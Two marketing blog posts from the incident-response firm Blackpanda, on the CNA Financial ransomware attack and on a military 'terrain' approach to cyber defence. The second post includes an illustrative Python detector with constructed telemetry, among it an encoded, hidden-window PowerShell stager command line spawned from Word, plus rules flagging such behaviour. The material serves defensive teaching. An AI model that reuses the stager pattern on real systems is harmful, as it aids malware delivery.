Sophisticated ransomware will be able to get past anti-virus protections and firewalls offered by outdated cyber defence systems. Having a proper IR (incident response) plan in place, recurring compromise assessments, and comprehensive cyber insurance coverage can help your organisation best combat the constantly evolving threats in the cyber landscape.

Prepare

CNA Financial Attack and How Firms Should Respond to Ransomware

Damages from ransomware go beyond data loss and large monetary expenses, as attackers often threaten to publicize stolen data if they are not paid immediately. Ransomware should be treated as a large-scale data breach, and organizations need to prepare for this eventuality by having a strong defense and recovery plan in place.

In the aftermath of the largest ransomware attack to date, building resilience to such incidents is crucial.

The CNA Financial Ransomware Attack

CNA Financial (“CNA”), one of the largest insurance companies in the US, announced that it had been hit by a sophisticated and debilitating ransomware attack this past March. The Phoenix cyber criminal group attacked CNA using the ‘Phoenix Locker’ malware, a variation of the Hades ransomware created by the Russian group Evil Corp. Whilst CNA declared that it did not lose access to any sensitive client data, over 15,000 company devices were encrypted and corporate networks were disrupted, forcing CNA to temporarily shut down its services. 

CNA worked with private sector companies and US government agencies to secure its systems and contain the malware. To end the attack, CNA paid the attackers USD 40 million in Bitcoin – the largest recorded ransom payment ever – despite FBI guidelines discouraging companies from paying ransom demands, as payment strengthens attackers’ capabilities and increases the effectiveness of such attacks in the future. 

The CNA Financial attack occurred within weeks of another ransomware incident hitting oil transportation company Colonial Pipeline, which paid USD 4.4 million to stop the attack and release its data. These cases are not isolated, and they serve as high-visibility examples of a pervasive ransomware problem that affects organizations of all sizes across the globe.

The Growing Incidence of Ransomware Attacks

According to reports from Bitdefender, 2020 saw a 485% increase in ransomware attacks compared to 2019, with a ransomware attack occurring every 11 seconds. In 2020, the average ransom request increased by over 170% from USD 115,123 to USD 312,493 according to Palo Alto Networks. 

Ransomware attacks typically target confidential or essential user data. After the malware penetrates the system, the targeted data is encrypted and made inaccessible to the user or organization. The attacker then requests the victim to pay a fee in order to receive a decryption key that can be used to unlock their data and avoid permanent loss or publication on the Internet. 

These attacks are highly compromising for organizations, not only for the data loss and reputational damage but because of the human emotions they leverage. Ransomware attacks often instill a sense of urgency, fear, and doubt that force people and companies to pay out large sums in the hope of recovering their data.

How to Respond to Ransomware

When an organization suffers a ransomware attack, the first call should be to your incident response team. Like medical first responders, trained incident response specialists are responsible for mitigating the effects of an incident in a timely and organized manner, including analyzing the intrusion, containing the impact, investigating the root cause, and remediating the issue with maximum efficiency and minimal business interruption.

At Blackpanda, our experienced team of ransomware professionals guides organizations through the process of dealing with a ransomware attack, helping to minimize losses, recover encrypted data, and negotiate and facilitate ransom payment.

In the event of a ransomware attack, your incident response specialists should conduct the following activities:

1. Containment & Loss Mitigation

Upon being notified of the incident, your IR team should immediately respond by quarantining and containing the ransomware, recovering as much data and digital assets as possible, and conducting digital forensics to attempt reverse engineering the malware and identify the attackers. Experienced ransomware specialists may also be able to identify and retrieve decryption keys from known ransomware databases to unlock data without resorting to paying the attackers.

Timely response is critical in the first hours of a ransomware attack, which is why Blackpanda recommends that IR planning and all response terms be agreed upon prior to an incident. Such agreements are often best delivered either as part of a comprehensive cyber insurance policy or through a pre-paid IR retainer (for those that do not qualify for insurance). At a bare minimum, companies should at least have an IR firm like Blackpanda on a Zero-Cost Retainer.

2. Ransomware Negotiation

If the IR team is unable to independently decrypt the data, they can help organizations facilitate the ransomware negotiation process given their understanding of different ransomware tools and techniques, the actors and motives behind an attack, as well as the competencies of the attackers. Negotiation efforts serve to achieve improved outcomes and provide the time and intelligence necessary for organizational leadership to make informed decisions.

Last year, 17% of ransom payers did not receive a working key to unlock encrypted data (Kaspersky, 2020). As such, a crucial part of the IR team’s work is also to assess the authenticity of decryption keys provided by the attackers through verified “proof of life” exercises. 

3. Ransom Payment & Facilitation

Once the negotiation has come to an accord, the IR team guides the organization through the payment of the ransom (if required and legal), ensuring that all transactions are fully verified, transparent, secure, and auditable.

Organizations should also be aware that on 1st October 2020, the US Department of Treasury’s Office of Foreign Assets Control (OFAC) issued a globally enforceable advisory regarding ransom payments to sanctioned entities, with associated penalties of up to USD 1 million and 20 years in prison. Blackpanda fully supports an organization’s due diligence efforts throughout the decision-making process, working closely with international law enforcement partners such as the US Secret Service to identify threat actors and sanctioned-entity status.

4. Eradication & Recovery

Once the correct decryption key has been provided, your IR specialists will help decrypt all data, restore system health, and ensure that the malware and its root cause are fully eradicated. Your IR team should also maintain thorough documentation of the incident in compliance with insurance and other regulatory requirements (such as MAS Reporting Requirements), which can be a complicated and time-consuming process for organizations to conduct independently.

How to Prevent Ransomware and Mitigate Loss

The CNA Financial case is a haunting warning among many that ransomware attackers are becoming increasingly sophisticated—even the largest organizations with the most advanced preventive systems remain vulnerable to ransomware attacks. 

While ransomware prevention can never completely eliminate the risk of falling victim to such attacks, it is crucial that organizations implement preventive best practices to minimize ransomware risk and mitigate potential loss. 

1. Endpoint Detection & Response

Having an industry-standard endpoint detection and response (EDR) solution in place is essential. It can protect your system from known viruses and alert users when malware is detected attempting to enter the system. Traditional signature-based antivirus tools focus on blocking malware signatures from a predefined list of threats, leaving users vulnerable to new or mutated malware. Blackpanda recommends organizations invest in next-generation behavior-based EDR solutions (like SentinelOne) which use artificial intelligence to identify and alert users to suspicious and malicious behaviors.

2. Secured Data Backups

If EDR tools are like cyber-sentries, encrypted backups are like cyber-vaults. Avoid losing important data to a ransomware attack by keeping regularly updated and encrypted backups, both offline and with security-protected cloud offerings (such as Acronis). Data backups allow organizations to fully recover from a ransomware incident as well as provide greater leverage in ransom negotiations.

Knowing the precise location of all sensitive data is also crucial to limit exposure to attacks and minimize business interruption. Access to such data should be protected by multi-factor authentication (MFA), and the principle of least privilege should be strictly adhered to.

3. IR Planning, Retained Response, & Cyber Insurance

Given that even the most secure network is vulnerable to cyberattacks, having an incident response team and plan in place is essential. The most cost-efficient vehicle for retaining IR services is through a cyber insurance policy—at a mere fraction of the price of a traditional retainer.

Comprehensive cyber insurance providers such as Pandamatics Underwriting offer coverage up to USD 5 million, inclusive of all incident response fees, legal and public relations support, as well as discounted rates on next-generation EDR, encrypted backup solutions, and other pre-breach consulting services and technologies.

Conclusion

The CNA Financial and Colonial Pipeline ransomware attacks highlight the potentially catastrophic disruptions such attacks can have on both individual organisations and the greater economy. With the increased frequency of ransomware across the world, ensuring an effective response and recovery protocol is necessary for organisations to both protect their data and avoid large payouts. 

On top of the hardening of systems security, knowing who to go to when an attack occurs is essential. Expert IR teams can aid organisations through the process of preparation and ransomware eradication through containment, negotiation with attackers, ransom payment guidance, and recovery support. Obtaining comprehensive cyber insurance will also help mitigate the impact of ransomware on organisations, covering financial loss and any costs incurred to contain and eradicate the threat.

The Basics

Cyber security: Just another terrain

The overlap between the physical and digital terrains forms the cornerstone of our approach to incident response. In this article, I delineate the specifics of our unique perspective in the hope that by better understanding the similarities between these terrains, readers will learn more about what we do, how we do it, and who we are as a company.

A terrain is usually defined as the ensemble of the features of a tract of land. Geographic terrains can be of many types—jungle, mountain, desert, urban, or otherwise—and with our increasing dependence on computers we have seen an entirely new kind of terrain emerge: digital. In fact, digital and physical terrains have more in common than you might think. 

As a former US Army Special Forces officer and a lifelong computer scientist, I observed that the fundamentals of military tactics in physical terrain hold true in the digital terrain of cyber security. Cyber security and physical security are merely derivations of the original concept of security; cyber attacks are nothing more than modern versions of the attacks humans have always experienced, only played out on a digital “terrain”.

Cyber security is not an IT problem—it is a security problem. 

For this reason, in building Blackpanda, we gathered exceptional individuals from military, law enforcement, and computer forensics backgrounds to develop bespoke and hyper-focused digital forensics and incident response services across APAC. Handling cyber incidents can be extremely stressful, requiring responders to act fast in an environment full of uncertainties. The focus and discipline we bring from our unique backgrounds have taught us to maintain our focus and calm in the worst situations, persevere in times of difficulty, prepare for the worst, and approach complex security challenges with clear, tried, and tested strategies.

The Importance of Terrain Analysis

I consider myself a classically trained military strategist and tactician, both from my time as a West Point cadet studying Cold War-era combined warfare tactics and later as a counterinsurgency battlefield commander in multiple theatres of war.

When I joined the US Army as a commissioned second lieutenant in 2001, I was posted to the DMZ in Korea along the 38th parallel where I patrolled my tank and mortar platoons as part of the 2nd Infantry Division. Being stationed along the border to North Korea was considered a “hardship” tour—the training schedule was very fast-paced, and we had monthly alert sequences to defend against an invasion from the North. 

I spent approximately 24 months in the frigid tundra of the Korean peninsula as part of the 2nd Infantry Division. Engineers, infantry, artillery, and attack helicopters all coordinated with my tank platoon and we moved as a single unit, although each had their specific roles and capabilities. We honed our skills with a tremendous amount of training on the combined arms training grounds in the rocky mountains of Korea. There, I practised complex tactical formations and honed my skills to analyse mountains, rivers, and deep valleys in defensive and offensive positions.

When developing a military plan, whether offensive or defensive, a tactician should first conduct an analysis of the battlefield terrain. Terrain analysis is critical for understanding the “chessboard” before even considering which pieces are in play, from both enemy and friendly elements. 

For example, a hilltop spur is a key terrain feature of the Korean mountains that provides a valuable dominant position. From this vantage point, the army can command fields of fire over a valley. In a desert urban scenario such as Mosul in Iraq, one could position troops at a critical four-lane highway intersection of three major throughways. Holding such an intersection could prevent the enemy from moving quickly throughout the region.

In these two examples, one can see that understanding the terrain and using it to your advantage plays a critical role in obtaining an overwatch position that prevents the enemy from freely and quickly advancing past the troops.

Applying Terrain Methodology to Provide Better, Faster Incident Response in APAC

Our experience as an incident response and digital forensics company has taught us that no two cyber terrains are the same. Every organisation is a combination of a number of factors including industry, size, geographic location, culture, personnel, and many more. Thus, it would be naive as incident responders to treat every case with a one-size-fits-all approach. 

At Blackpanda, we offer our clients on-call digital forensics and incident response services as well as pre-breach response planning, assessment, and consulting. While other incident response companies limit their intervention to showing up in the moment of a breach, our objective is to build long-term relationships and a deep understanding of our clients’ individual cyber terrains.

By doing so, we can provide better, faster incident response based on the mutual and comprehensive understanding of the environment—including both its advantages and vulnerabilities. We do this through seeking enhanced visibility, carrying out manned reconnaissance, and regularly conducting response readiness drills.

Enhanced Visibility | Behaviour-based Endpoint Monitoring

One of the most important things we do when we begin working with new clients is to install endpoint technologies that continuously monitor for threats and rapidly gather forensic data following an attack. These tools enhance our visibility across an environment and allow us to respond more effectively to an attack. They can be thought of as the initial scout, ensuring that the tactical team following close behind can secure the position or, in this case, the endpoint.

Typical anti-virus tools act as gatekeepers, blocking only files and processes that match known threat signatures. Behaviour-based EDR instead records what the endpoint actually does (process creation and lineage, command lines, file, registry and network activity), establishes a baseline of normal behaviour for the environment, and flags activity that deviates from it or matches a known-malicious pattern, which means it can detect new threats whose signatures have never been seen. The caveat is that behavioural detections are only as good as the baseline and the rules behind them: anomalies still need human triage, and anything already present when the baseline was learned will look normal, which is one reason an independent compromise assessment remains necessary.

With monitoring and forensic collection in place prior to a breach, the enhanced visibility of settings, behaviour, and forensic evidence allows our team not only to detect threats faster but also to triage, hunt for similar activity across all endpoints, and eradicate malware more quickly and efficiently during an attack.
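To make the signature-versus-behaviour distinction concrete, the following is an added, illustrative Python example and not Blackpanda's own tooling. It runs a signature check and a behavioural check over a handful of constructed process-creation records: every host name, hash label, command line and detection rule is made up for the demonstration, and real telemetry would carry SHA-256 digests and far more event types. A "quiet week" of events is used to learn which parent-to-child process lineages are normal; the intrusion-day events then include one sample with a known-bad hash (the only thing the signature check catches), a re-packed dropper with a never-seen hash, and an Office document spawning encoded PowerShell. The final `hunt` function shows the follow-on step the paragraph describes: once one alert is triaged, sweeping every endpoint's telemetry for the same artefact.

```python
"""Signature-only versus behaviour-based endpoint detection.

Added example, not Blackpanda tooling. Every event, hash label and rule
below is constructed for the demonstration.
"""
from collections import Counter
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# All a signature engine knows: file hash -> malware family (constructed labels).
KNOWN_BAD_HASHES = {"hash-invoice-viewer": "Trojan.Downloader.Generic"}


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record as an EDR agent would report it."""
    host: str
    parent: str
    child: str
    sha256: str
    cmdline: str


# Constructed "quiet week" telemetry used to learn what normal lineage looks like.
BASELINE_EVENTS = [
    ProcessEvent("ws-01", "explorer.exe", "outlook.exe", "hash-outlook", "outlook.exe"),
    ProcessEvent("ws-02", "explorer.exe", "outlook.exe", "hash-outlook", "outlook.exe"),
    ProcessEvent("ws-03", "explorer.exe", "winword.exe", "hash-winword", "winword.exe"),
    ProcessEvent("ws-01", "explorer.exe", "winword.exe", "hash-winword", "winword.exe"),
    ProcessEvent("ws-02", "outlook.exe", "winword.exe", "hash-winword", "winword.exe /n"),
    ProcessEvent("ws-03", "outlook.exe", "winword.exe", "hash-winword", "winword.exe /n"),
    ProcessEvent("ws-01", "services.exe", "svchost.exe", "hash-svchost", "svchost.exe -k netsvcs"),
    ProcessEvent("ws-02", "services.exe", "svchost.exe", "hash-svchost", "svchost.exe -k netsvcs"),
]

# Constructed events from the day of an intrusion.
NEW_EVENTS = [
    ProcessEvent("ws-01", "explorer.exe", "outlook.exe", "hash-outlook", "outlook.exe"),
    # Macro-laden document launching an encoded PowerShell stager.
    ProcessEvent("ws-02", "winword.exe", "powershell.exe", "hash-powershell",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    # Known sample: the one case a signature engine catches.
    ProcessEvent("ws-03", "explorer.exe", "invoice_viewer.exe", "hash-invoice-viewer", "invoice_viewer.exe"),
    # Re-packed dropper with a never-seen hash, spawned from the mail client on two hosts.
    ProcessEvent("ws-04", "outlook.exe", "update.exe", "hash-novel-update", "update.exe /silent"),
    ProcessEvent("ws-05", "outlook.exe", "update.exe", "hash-novel-update", "update.exe /silent"),
    ProcessEvent("ws-01", "services.exe", "svchost.exe", "hash-svchost", "svchost.exe -k netsvcs"),
]


def signature_scan(events):
    """Gatekeeper model: flag only processes whose hash is already known bad."""
    return [(e, KNOWN_BAD_HASHES[e.sha256]) for e in events if e.sha256 in KNOWN_BAD_HASHES]


def build_baseline(events):
    """Count how often each parent->child lineage occurred during normal operation."""
    return Counter((e.parent.lower(), e.child.lower()) for e in events)


def behaviour_scan(events, baseline, min_seen=2):
    """Flag events that deviate from the baseline or match a behavioural rule.

    Returns (event, [reasons]) pairs; one event can trip several rules.
    """
    alerts = []
    for e in events:
        parent, child = e.parent.lower(), e.child.lower()
        tokens = e.cmdline.lower().split()
        reasons = []
        if baseline[(parent, child)] < min_seen:
            reasons.append("parent->child lineage not seen in baseline")
        if parent in OFFICE_APPS and child in SHELLS:
            reasons.append("office application spawned a scripting host")
        if child == "powershell.exe" and any(t in tokens for t in ("-enc", "-encodedcommand")):
            reasons.append("encoded PowerShell command line")
        if reasons:
            alerts.append((e, reasons))
    return alerts


def missed_by_signatures(events, baseline):
    """Events the behavioural engine flags that the signature engine does not."""
    known = {e for e, _ in signature_scan(events)}
    return [e for e, _ in behaviour_scan(events, baseline) if e not in known]


def hunt(events, sha256):
    """Sweep every endpoint's telemetry for the same artefact once one alert is triaged."""
    return sorted({e.host for e in events if e.sha256 == sha256})


if __name__ == "__main__":
    baseline = build_baseline(BASELINE_EVENTS)
    for e, family in signature_scan(NEW_EVENTS):
        print(f"[signature] {e.host}: {e.child} = {family}")
    for e, reasons in behaviour_scan(NEW_EVENTS, baseline):
        print(f"[behaviour] {e.host}: {e.parent} -> {e.child}: {'; '.join(reasons)}")
    print("hosts carrying the novel dropper:", hunt(NEW_EVENTS, "hash-novel-update"))
```

Run as a script, the signature check reports only the `invoice_viewer.exe` sample, while the behavioural check also reports the PowerShell stager and both copies of the re-packed dropper, and the hunt returns the two hosts that share the dropper's hash. The `min_seen` threshold is the tuning knob this kind of detection always needs: set it too low and one odd-but-benign launch during the baseline window whitelists that lineage forever; set it too high and rarely used but legitimate tools generate noise for analysts to triage.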

Manned Reconnaissance | Compromise Assessments

Even the most advanced cyber security technologies may be thwarted or evaded as cyber criminals continue to evolve their tactics daily. For this reason, we highly recommend businesses amplify their reconnaissance efforts through regularly conducted human-led Compromise Assessments.

During a Compromise Assessment, our threat hunting specialists perform an inside-out investigative sweep of your cyber terrain for any signs of compromise, including dormant, active, or past attacks that other tools may have missed. We use a continuously updated library of thousands of proprietary queries to search for malware on the network and assess the overall security posture of the organisation. We also scrape the Dark Web for leaked information and hacker forum chatter about the company that may indicate an existing compromise or foreshadow an upcoming attack. 

The human-led, tech-enhanced, and comprehensive nature of Blackpanda’s compromise assessments means that our specialists form a deep understanding of your environment and overall security posture in the process.

We recommend organisations conduct Compromise Assessments at least quarterly, if not weekly or daily, depending on your risk tolerance. By regularly checking internal systems for vulnerabilities and early signs of attacks, our team will come to know an environment like the back of their hand—facilitating faster and more effective response to attacks on your organisation and also stamping out early problems before they reach their final form.

Regular Drills | IR Planning and Tabletop Exercises

In the military, one of the most critical factors of mission success is proper planning. Setting up scenarios and running through reaction protocols is the best way to ensure that response is prompt and effective, smoothing out any potential bumps and hiccups before a live engagement. 

At Blackpanda, we provide the same level of preparation through our Incident Response Planning and Tabletop Exercises. We work closely with clients to understand their terrain and unique strengths, weaknesses, and requirements, designing detailed action plans for dealing with a range of threats. These Incident Response Plans and Playbooks cover everything from communications, escalation, and handover procedures to technical responses for individual attack types. 

We then test those plans by conducting tabletop exercises—live practice runs where relevant actors across the organisation are involved in improving the speed and efficiency of response and recovery. Through these efforts, both Blackpanda and your internal team gain a stronger awareness of your digital environment, “terrain” features, advantages, and disadvantages.

In Closing: No terrain is ever 100% secure

The above terrain-focused methodology and pre-breach services allow us to develop greater visibility and deeper understanding of your organisation’s digital environment; however, no terrain—whether physical or digital—can ever be 100% secure.

As the US Army Survival, Evasion, Resistance, and Escape (SERE) Level C School puts it: “Preparation is the key to survival.” 

Modern organisations must therefore have a plan in place for when defensive measures fail and specialised emergency response is required. The most effective way to limit damage and financial loss is to have a trained, professional incident response team already on call. Blackpanda’s IR-1 subscription is designed to give SMBs exactly that, helping them manage cyber breaches and mitigate their impact by reducing operational downtime and financial and reputational damage. 

Just as each Army division specialises in a particular setting—whether airborne, armoured, infantry, or other—we chose for Blackpanda to focus on a “One-Kick Philosophy” of mastering digital forensics and incident response, unmatched in the cyber terrain.

We take a hyper-focused approach in preparing our clients for cyber incidents, ensuring that their networks are secure and intervening promptly when things take a turn for the worse. By contacting us before you are breached, we can help strengthen your security posture ahead of time and be promptly available in a time of crisis. 

Our emphasis on preparedness is informed by our military background and terrain-focused methodology, reinforcing our identity as Asia’s premier digital forensics and incident response provider.

To learn more about our white-glove, Asia-focused digital forensics and incident response services, contact Blackpanda today.
